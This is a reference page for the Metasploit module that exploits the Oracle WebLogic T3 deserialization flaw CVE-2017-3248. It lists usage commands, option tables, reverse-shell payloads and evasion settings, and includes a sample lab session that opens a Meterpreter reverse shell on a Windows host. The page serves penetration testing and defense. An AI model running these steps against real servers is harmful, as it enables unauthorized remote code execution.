Oracle Weblogic Server Deserialization RCE - RMI UnicastRef - Metasploit


This page contains detailed information about how to use the exploit/multi/misc/weblogic_deserialize_unicastref metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Oracle Weblogic Server Deserialization RCE - RMI UnicastRef
Module: exploit/multi/misc/weblogic_deserialize_unicastref
Source code: modules/exploits/multi/misc/weblogic_deserialize_unicastref.rb
Disclosure date: 2017-01-25
Last modification time: 2021-02-17 12:33:59 +0000
Supported architecture(s): -
Supported platform(s): Solaris, Unix, Windows
Target service / protocol: -
Target network port(s): 7001
List of CVEs: CVE-2017-3248

An unauthenticated attacker with network access to the Oracle Weblogic Server T3 interface can send a serialized object (sun.rmi.server.UnicastRef) to the interface to execute code on vulnerable hosts.

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Basic Usage


msf > use exploit/multi/misc/weblogic_deserialize_unicastref
msf exploit(weblogic_deserialize_unicastref) > show targets
    ... a list of targets ...
msf exploit(weblogic_deserialize_unicastref) > set TARGET target-id
msf exploit(weblogic_deserialize_unicastref) > show options
    ... show and set options ...
msf exploit(weblogic_deserialize_unicastref) > exploit

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Knowledge Base


Description


Oracle Weblogic Server v10.3.6.0, v12.1.3.0, and v12.2.1.1 are vulnerable to a deserialization vulnerability (CVE 2017-3248) in the core Components subcomponent due to unsafe deserialization of Java objects by the RMI registry and produce a JRMP connection from the target, which can be used to execute code on vulnerable systems. An unauthenticated user with network access via T3 could exploit the vulnerability. This module has been tested against Oracle Weblogic Server v10.3.6.0 and v12.1.3.0 running on Windows 7 x64 using JDK v7u80.

Vulnerable Application


Oracle Weblogic Server v10.3.6.0, v12.1.3.0, and v12.2.1.1.

Verification Steps


  1. ./msfconsole -q
  2. use exploit/multi/misc/weblogic_deserialize_unicastref
  3. set srvhost <srvhost>
  4. set srvport <srvport>
  5. set rhosts <rhost>
  6. set rport <srvport>
  7. exploit
  8. sessions -i 1

Scenarios


Tested on Windows 7 x64 running Oracle Weblogic Server 10.3.6.0 and 12.1.3.0 on JDK v7u80

 msf exploit(multi/misc/weblogic_deserialize_unicastref) > set srvhost 192.168.192.136
 srvhost => 192.168.192.136
 msf exploit(multi/misc/weblogic_deserialize_unicastref) > set srvport 8888
 srvport => 8888
 msf exploit(multi/misc/weblogic_deserialize_unicastref) > set rhost 192.168.192.6
 rhost => 192.168.192.6
 msf exploit(multi/misc/weblogic_deserialize_unicastref) > set rport 7001
 rport => 7001
 msf exploit(multi/misc/weblogic_deserialize_unicastref) > exploit
 [*] Exploit running as background job 17.

 [*] Started reverse TCP handler on 192.168.192.136:4444 
 msf exploit(multi/misc/weblogic_deserialize_unicastref) > [*] 192.168.192.6:7001 - Sending handshake...
 [*] 192.168.192.6:7001 - Sending T3 request object...
 [*] 192.168.192.6:7001 - Sending client object payload...
 [*] 192.168.192.6:7001 - Sending payload to client: 192.168.192.6
 [*] Sending stage (179779 bytes) to 192.168.192.6
 [*] Meterpreter session 9 opened (192.168.192.136:4444 -> 192.168.192.6:49283) at 2018-12-14 11:45:44 -0800
 [*] 192.168.192.6:7001 - Server stopped.
 msf exploit(multi/misc/weblogic_deserialize_unicastref) > sessions -i 9
 [*] Starting interaction with 9...

 meterpreter > sysinfo
 Computer        : GIOTTO-HS-W7
 OS              : Windows 7 (Build 7600).
 Architecture    : x64
 System Language : en_US
 Domain          : WORKGROUP
 Logged On Users : 2
 Meterpreter     : x86/windows

Go back to menu.

Msfconsole Usage


Here is how the multi/misc/weblogic_deserialize_unicastref exploit module looks in the msfconsole:

msf6 > use exploit/multi/misc/weblogic_deserialize_unicastref

[*] Using configured payload cmd/unix/reverse_python
msf6 exploit(multi/misc/weblogic_deserialize_unicastref) > show info

       Name: Oracle Weblogic Server Deserialization RCE - RMI UnicastRef
     Module: exploit/multi/misc/weblogic_deserialize_unicastref
   Platform: Unix, Windows, Solaris
       Arch: 
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2017-01-25

Provided by:
  Andres Rodriguez
  Jacob Baines
  Aaron Soto

Available targets:
  Id  Name
  --  ----
  0   Unix
  1   Windows
  2   Solaris

Check supported:
  No

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT    7001             yes       The target port (TCP)
  SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
  SRVPORT  8080             yes       The local port to listen on.
  SSL      false            no        Negotiate SSL for incoming connections
  SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)

Payload information:
  Avoid: 1 characters

Description:
  An unauthenticated attacker with network access to the Oracle 
  Weblogic Server T3 interface can send a serialized object 
  (sun.rmi.server.UnicastRef) to the interface to execute code on 
  vulnerable hosts.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2017-3248

Module Options


This is a complete list of options available in the multi/misc/weblogic_deserialize_unicastref exploit:

msf6 exploit(multi/misc/weblogic_deserialize_unicastref) > show options

Module options (exploit/multi/misc/weblogic_deserialize_unicastref):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    7001             yes       The target port (TCP)
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)

Payload options (cmd/unix/reverse_python):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port
   SHELL  /bin/bash        yes       The system shell to use.

Exploit target:

   Id  Name
   --  ----
   0   Unix

Advanced Options


Here is a complete list of advanced options supported by the multi/misc/weblogic_deserialize_unicastref exploit:

msf6 exploit(multi/misc/weblogic_deserialize_unicastref) > show advanced

Module advanced options (exploit/multi/misc/weblogic_deserialize_unicastref):

   Name                                    Current Setting  Required  Description
   ----                                    ---------------  --------  -----------
   CHOST                                                    no        The local client address
   CPORT                                                    no        The local client port
   ConnectTimeout                          10               yes       Maximum number of seconds to establish a TCP connection
   ContextInformationFile                                   no        The information file that contains context information
   DisablePayloadHandler                   false            no        Disable the handler code for the selected payload
   EnableContextEncoding                   false            no        Use transient context when encoding payloads
   ListenerComm                                             no        The specific communication channel to use for this service
   Powershell::encode_final_payload        false            yes       Encode final payload for -EncodedCommand
   Powershell::encode_inner_payload        false            yes       Encode inner payload for -EncodedCommand
   Powershell::exec_in_place               false            yes       Produce PSH without executable wrapper
   Powershell::exec_rc4                    false            yes       Encrypt PSH with RC4
   Powershell::method                      reflection       yes       Payload delivery method (Accepted: net, reflection, old, msil)
   Powershell::no_equals                   false            yes       Pad base64 until no "=" remains
   Powershell::noninteractive              true             yes       Execute powershell without interaction
   Powershell::persist                     false            yes       Run the payload in a loop
   Powershell::prepend_protections_bypass  true             yes       Prepend AMSI/SBL bypass
   Powershell::prepend_sleep                                no        Prepend seconds of sleep
   Powershell::remove_comspec              false            yes       Produce script calling powershell directly
   Powershell::strip_comments              true             yes       Strip comments
   Powershell::strip_whitespace            false            yes       Strip whitespace
   Powershell::sub_funcs                   false            yes       Substitute function names
   Powershell::sub_vars                    true             yes       Substitute variable names
   Powershell::wrap_double_quotes          true             yes       Wraps the -Command argument in single quotes
   Proxies                                                  no        A proxy chain of format type:host:port[,type:host:port][...]
   SSLCipher                                                no        String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH"
   SSLCompression                          false            no        Enable SSL/TLS-level compression
   SSLVerifyMode                           PEER             no        SSL verification method (Accepted: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER)
   SSLVersion                              Auto             yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   VERBOSE                                 false            no        Enable detailed status messages
   WORKSPACE                                                no        Specify the workspace for this module

Payload advanced options (cmd/unix/reverse_python):

   Name                        Current Setting  Required  Description
   ----                        ---------------  --------  -----------
   AutoRunScript                                no        A script to run automatically on session creation.
   AutoVerifySession           true             yes       Automatically verify and drop invalid sessions
   CommandShellCleanupCommand                   no        A command to run before the session is closed
   CreateSession               true             no        Create a new session for every successful login
   InitialAutoRunScript                         no        An initial script to run on session creation (before AutoRunScript)
   ReverseAllowProxy           false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                   no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                      no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                          no        The specific communication channel to use for this listener
   ReverseListenerThreaded     false            yes       Handle every connection in a new thread (experimental)
   StagerRetryCount            10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait             5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                     false            no        Enable detailed status messages
   WORKSPACE                                    no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the multi/misc/weblogic_deserialize_unicastref module can exploit:

msf6 exploit(multi/misc/weblogic_deserialize_unicastref) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Unix
   1   Windows
   2   Solaris

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the multi/misc/weblogic_deserialize_unicastref exploit:

msf6 exploit(multi/misc/weblogic_deserialize_unicastref) > show payloads

Compatible Payloads
===================

   #  Name                                 Disclosure Date  Rank    Check  Description
   -  ----                                 ---------------  ----    -----  -----------
   0  payload/cmd/unix/reverse_python                       normal  No     Unix Command Shell, Reverse TCP (via Python)
   1  payload/cmd/unix/reverse_python_ssl                   normal  No     Unix Command Shell, Reverse TCP SSL (via python)

Evasion Options


Here is the full list of possible evasion options supported by the multi/misc/weblogic_deserialize_unicastref exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(multi/misc/weblogic_deserialize_unicastref) > show evasion

Module evasion options:

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   TCP::max_send_size  0                no        Maximum tcp segment size.  (0 = disable)
   TCP::send_delay     0                no        Delays inserted before every send.  (0 = disable)

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Oracle WebLogic Server banner cannot be found


Here is a relevant code snippet related to the "Oracle WebLogic Server banner cannot be found" error message:

83:	    )
84:	
85:	    return CheckCode::Unknown unless resp && resp.code == 200
86:	
87:	    unless resp.body.include?('Oracle WebLogic Server Administration Console')
88:	      vprint_warning("Oracle WebLogic Server banner cannot be found")
89:	      return CheckCode::Unknown
90:	    end
91:	
92:	    /WebLogic Server Version: (?<version>\d+\.\d+\.\d+\.\d*)/ =~ resp.body
93:	    unless version

Oracle WebLogic Server version cannot be found


Here is a relevant code snippet related to the "Oracle WebLogic Server version cannot be found" error message:

89:	      return CheckCode::Unknown
90:	    end
91:	
92:	    /WebLogic Server Version: (?<version>\d+\.\d+\.\d+\.\d*)/ =~ resp.body
93:	    unless version
94:	      vprint_warning("Oracle WebLogic Server version cannot be found")
95:	      return CheckCode::Unknown
96:	    end
97:	
98:	    version = Rex::Version.new(version)
99:	    vprint_good("Detected Oracle WebLogic Server Version: #{version}")

Go back to menu.


References


See Also


Check also the following modules related to this module:

Related Nessus plugins:

Authors


  • Andres Rodriguez
  • Jacob Baines
  • Aaron Soto

Version


This page has been produced using Metasploit Framework version 6.1.26-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.